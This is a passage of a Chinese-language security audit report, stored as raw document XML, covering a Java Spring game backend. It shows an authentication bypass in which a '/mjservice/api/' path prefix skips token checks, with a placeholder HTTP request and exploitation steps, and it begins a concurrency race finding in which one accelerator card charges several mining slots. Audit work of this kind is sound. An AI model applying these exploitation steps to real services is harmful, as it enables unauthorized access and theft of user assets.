        <w:t>（放行）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>零凭证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>到达 Controller，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.ATTR_USER_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 属性为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="89"/>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：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径下存在钱包操作、提现、转账等资金接口，攻击者可在无 Token 情况下直接调用，结合 null userId 的处理逻辑可能导致未授权资金操作或越权访问任意用户数据。</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SecurityConfig.java — Spring Security 路径放行规则（攻击者目标路径被显式放行）</w:t>
              <w:br/>
              <w:t>private static boolean isPermitPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.startsWith("/ws/")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || normalizedPath.startsWith("/api/")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || normalizedPath.startsWith("/mjservice/api/")) return true;  // ← /mjservice/api/** 被无条件放行</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② TokenAuthFilter.java — shouldNotFilter（过滤器入口）</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>protected boolean shouldNotFilter(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String decodedPath = URL_PATH_HELPER.getPathWithinApplication(request);  // ← 获取路径，如 /mjservice/api/user/profile</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (StrUtil.isBlank(decodedPath)) decodedPath = "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (containsPathTraversal(decodedPath)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String normalizedPath = getNormalizedPath(request);  // ← normalizedPath = /mjservice/api/user/profile</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return isNoTokenPath(normalizedPath);  // ← 漏洞流向下游</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ TokenAuthFilter.java — isNoTokenPath（漏洞点 sink）</w:t>
              <w:br/>
              <w:t>private static boolean isNoTokenPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!normalizedPath.startsWith("/api/")) return true;  // ← 漏洞点：/mjservice/api/... 不以 /api/ 开头，直接 return true = 跳过 Token 校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (String pattern : NO_TOKEN_PATTERNS) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (ANT_PATH_MATCHER.match(pattern, normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return false;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/mjservice/api/user/&lt;受保护的用户接口路径&gt; HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（无 Authorization 请求头）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">对比正常需要 Token 的请求路径 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/&lt;接口&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，将前缀替换为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 即可绕过 Token 认证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确认目标服务在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前缀下存在路由（Spring Security 配置中已显式放行该前缀，表明该路由存在）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送不携带任何 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Authorization: Bearer &lt;token&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求头的 HTTP 请求至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/&lt;受保护端点&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 因路径不以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头而直接跳过，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>request.getAttribute("userId")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Security 层因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isPermitPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 放行，请求到达 Controller</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若 Controller 或 Service 层对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 做了容错处理（如当作匿名用户、跳过鉴权），则可实现未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="95"/>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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：完全未授权，无需任何凭证</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7"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.java.shouldNotFilter → TokenAuthFilter.java.isNoTokenPath</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audit_m040_072_shouldNotFilter_ctrl-path3of3.md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：AcceleratorService.java#charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_6" w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞5：加速卡余额并发竞态（TOCTOU）导致单卡充值多个矿机坑位</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="98"/>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：加速卡余额扣减 TOCTOU 竞态条件——单张加速卡可为多个矿机坑位充电</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="99"/>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src/main/java/com/gameBack/mjservice/service/AcceleratorService.java:charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="100"/>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：资金/资产安全——并发竞态（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="101"/>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2"/>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：普通已登录用户（需有效 Bearer Token + 有效签名）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charge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对加速卡余额的操作是经典的"先读后写"（Read-Modify-Write）非原子模式：先 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读出余额实体，在应用层做 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance &gt;= ACCEL_COST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断，通过后再 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>setBalance(balance - ACCEL_COST)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。整个检查-扣减序列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有使用行级悲观锁（SELECT FOR UPDATE）、乐观锁（version/CAS）或任何分布式锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在默认隔离级别（READ COMMITTED）下，两个并发事务可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时读到相同的余额快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，各自通过余额充足检查，分别对不同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完成充电，而最终余额仅被扣减一次（后提交的事务覆盖先提交的写入，余额不降为负，但两个矿机坑位均被标记 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）——实质是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用 1 张加速卡为 N 个矿机充电</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@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注解本身无法阻止此问题：默认 READ COMMITTED 隔离级别下，事务间读取已提交数据，并发窗口真实存在；即使 REPEATABLE READ 隔离级别，JPA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是 last-write-wins，后提交者直接覆盖余额，并不会抛出异常。</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/api/accelerator/charge</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ SignAuthTestFilter（签名校验，通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ TokenAuthFilter（Token校验，userId 从 Token 安全提取）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ AcceleratorController.charge(userId, form.getSlotId())</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  ↓ AcceleratorService.charge(userId, slotId)   ← 竞态窗口在此</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者持有1张加速卡（balance=1，假设 ACCEL_COST=1），以不同 slotId 并发发送多个请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">并发线程 T1、T2 同时执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserId(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，各自拿到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>accel.balance = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的快照</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T1、T2 均通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance &gt;= ACCEL_COST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T1：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>setBalance(1-1=0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，矿机 slotId=1 设为已充电</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="106"/>
        </w:numPr>
